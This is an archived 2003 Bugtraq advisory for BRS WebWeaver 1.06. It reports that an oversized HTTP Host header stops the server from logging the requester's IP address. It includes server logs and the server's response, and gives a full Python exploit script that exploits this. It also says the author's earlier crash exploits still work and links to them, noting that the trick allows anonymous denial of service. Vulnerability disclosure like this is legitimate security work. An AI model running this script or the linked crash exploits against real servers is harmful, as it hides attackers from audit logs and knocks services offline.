BRS WebWeaver: Anonymous Surfing

To: bugtraq@xxxxxxxxxxxxxxxxx, vuln@xxxxxxxxxxxxxxxx
Subject: BRS WebWeaver: Anonymous Surfing
From: "euronymous" <just-a-user@xxxxxxxxx>
Date: Wed, 24 Sep 2003 19:59:23 +0400 (MSD)
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Reply-to: just-a-user@xxxxxxxxx
Sender: just-a-user@xxxxxxxxx

=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: BRS WebWeaver: Anonymous Surfing
product: BRS WebWeaver 1.06
vendor: http://www.brswebweaver.com
risk: high
date: 09/24/2k3
discovered by: euronymous /F0KP 
advisory urls: http://f0kp.iplus.ru/bz/027_en
               http://f0kp.iplus.ru/bz/027_ru 
contact email: euronymous at iplus dot ru
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=

0x01. Anonymous surfing
=======================

WebWeaver  1.06  and probably prior versions will allow `anonymous surfing' with
some  trick.  If  you  request  the  http  server with long `Host' field of HTTP
packet, then Webweaver dont logs your IP adrress in server log:

HTTP Server Started - 24/Sep/2003:18:13:39
10.0.0.6 - - [24/Sep/2003:18:15:01] "GET / HTTP/1.1" 304  "-" "-"
10.0.0.6 - - [24/Sep/2003:18:15:03] "GET / HTTP/1.1" 304  "-" "-"
 - - [24/Sep/2003:18:15:14] "GET / HTTP/1.1" 414  "-" "-"
 - - [24/Sep/2003:18:16:01] "GET / HTTP/1.1" 414  "-" "-"
 - - [24/Sep/2003:18:16:11] "GET / HTTP/1.1" 414  "-" "-"


HTTP server response:
--------------------- 

HTTP/1.0 414 Request-URI Too Large
Sever: BRS WebWeaver/1.06
Date: Wed, 24 Sep 2003 14:16:11 GMT
Content-Type: text/html

<HTML><HEAD><TITLE>414 Request-URI Too Large</TITLE></HEAD><BODY><H1>414 Request
-URI Too Large</H1>The requested URL's length exceeds the capacity limit for thi
s server.</BODY></HTML>


Exploit code:
-------------

#! /usr/bin/env python
##
# by euronymous [ http://f0kp.iplus.ru ]
#
# Usage: ./WWanon.py <target_host>
##

import sys, socket

H0ST = sys.argv[1]
BUF = 'fp' * 0x815F
f = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f.connect((H0ST,80))
f.send('GET / HTTP/1.1\r\n')
f.send('Host: '+BUF+'\n\n') 
WWout = f.recv(1024)
f.close
print WWout


0x02. Remote crashes again
==========================

WW  author was unable to fix early overflow conditions in his crappy proggie, he
is  just increases the vulnerable buffer size. Therefore, you still can to crash
any WW instances with exploits, released earlier, but you have to change size of
request  in  exploit  code.  Using  technik,  that  mentioned above, you can DoS
anonymously.

Exploit urls:

[1] http://f0kp.iplus.ru/bz/fWWhtdos.py - will crash WW with long GET request.
[2] http://f0kp.iplus.ru/bz/fadvWWhtdos.py - will crash WW with HEAD or POST


0x03. Greetings
===============

Jlx, nimber, R00T, black_c0de, OverG, f0st3r, 3APA3A and more..

Prev by Date: Re: AIM Password theft
Next by Date: Re: AIM Password theft
Previous by thread: Re: [Full-Disclosure] GLSA: openssh (200309-14)
Next by thread: Denial of Service against Gauntlet-Firewall / SQL-Gateway
Index(es):
- Date
- Thread